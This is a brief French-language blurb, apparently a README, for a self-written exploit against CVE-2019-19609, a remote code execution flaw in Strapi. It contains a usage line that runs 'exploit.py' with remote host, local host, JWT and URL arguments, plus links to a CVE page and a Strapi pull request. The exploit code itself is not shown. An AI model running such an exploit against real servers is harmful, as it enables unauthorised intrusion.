
Le framework Strapi vulnérable à une exécution de code à distance
Strapi Framework vulnérable à une exécution de code à distance
Eh bien, je n'ai trouvé aucun exploit pour CVE-2019-19609, donc j'en ai écrit un. :/
python3 exploit.py <rhost> <lhost> <jwt> <url>
https://hack-fast.herokuapp.com/cve/CVE-2019-19609
https://github.com/strapi/strapi/pull/4636